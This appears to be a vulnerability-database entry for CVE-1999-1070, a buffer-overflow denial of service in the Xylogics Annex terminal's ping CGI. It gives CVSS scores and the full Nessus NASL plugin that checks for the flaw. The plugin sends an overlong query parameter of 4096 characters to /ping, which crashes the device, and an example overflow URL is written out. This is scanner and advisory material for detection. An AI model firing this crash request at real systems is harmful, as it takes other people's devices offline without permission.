Vulnerabilities > CVE-1999-1070 - Unspecified vulnerability in Xylogics Annex

047910
CVSS 5.0 - MEDIUM
Attack vector
NETWORK
Attack complexity
LOW
Privileges required
NONE
Confidentiality impact
NONE
Integrity impact
NONE
Availability impact
PARTIAL
network
low complexity
xylogics
nessus
NVD
Published: 1998-07-25
Updated: 2008-09-05

Summary

Buffer overflow in ping CGI program in Xylogics Annex terminal service allows remote attackers to cause a denial of service via a long query parameter.

Vulnerable Configurations

Part Description Count
Application
Xylogics
1

Nessus

NASL familyCGI abuses
NASL idANNEX_DOS.NASL
descriptionIt was possible to crash the remote Annex terminal by connecting to the HTTP port, and requesting the
last seen2020-06-01
modified2020-06-02
plugin id10017
published1999-06-22
reporterThis script is Copyright (C) 1999-2018 Tenable Network Security, Inc.
sourcehttps://www.tenable.com/plugins/nessus/10017
titleXylogics Annex Terminal Service ping CGI Program DoS
code
#
# (C) Tenable Network Security, Inc.
#

include("compat.inc");

if (description)
{
 script_id(10017);
 script_version("1.40");
 script_cvs_date("Date: 2018/06/13 18:56:25");

 script_cve_id("CVE-1999-1070");

 script_name(english:"Xylogics Annex Terminal Service ping CGI Program DoS");
 script_summary(english:"Crashes an Annex terminal");

 script_set_attribute(attribute:"synopsis", value:"The remote host is vulnerable to a denial of service.");
 script_set_attribute(attribute:"description", value:
"It was possible to crash the remote Annex terminal by connecting to
the HTTP port, and requesting the '/ping' CGI script with an argument
that is too long. For example:

 http://www.example.com/ping?query=AAAAA(...)AAAAA");
 script_set_attribute(attribute:"solution", value:"Remove the '/ping' CGI script from your web server.");
 script_set_cvss_base_vector("CVSS2#AV:N/AC:M/Au:N/C:N/I:N/A:C");

 script_set_attribute(attribute:"vuln_publication_date", value:"1998/07/25");
 script_set_attribute(attribute:"plugin_publication_date", value:"1999/06/22");

 script_set_attribute(attribute:"potential_vulnerability", value:"true");
 script_set_attribute(attribute:"plugin_type", value:"remote");
 script_end_attributes();

 script_category(ACT_KILL_HOST);
 script_copyright(english:"This script is Copyright (C) 1999-2018 Tenable Network Security, Inc.");
 script_family(english:"CGI abuses");

 script_dependencie("find_service1.nasl", "http_version.nasl", "no404.nasl");
 script_require_keys("Settings/ParanoidReport");
 script_require_ports("Services/www", 80);
 exit(0);
}

include("audit.inc");
include("global_settings.inc");
include("misc_func.inc");
include("http.inc");

if (report_paranoia < 2) audit(AUDIT_PARANOID);

port = get_http_port(default:80);
if  (http_is_dead(port: port)) exit(0);

cgi = "/ping";
if (! is_cgi_installed3(item:cgi, port:port)) exit(0);

start_denial();
r = http_send_recv3(port: port, item: strcat(cgi, "?query=", crap(4096)), method: 'GET');
if (http_is_dead(port: port, retry: 3))
{
 alive = end_denial();
 if(!alive)
 {
   security_hole(port);
   set_kb_item(name:"Host/dead", value:TRUE);
 }
}

References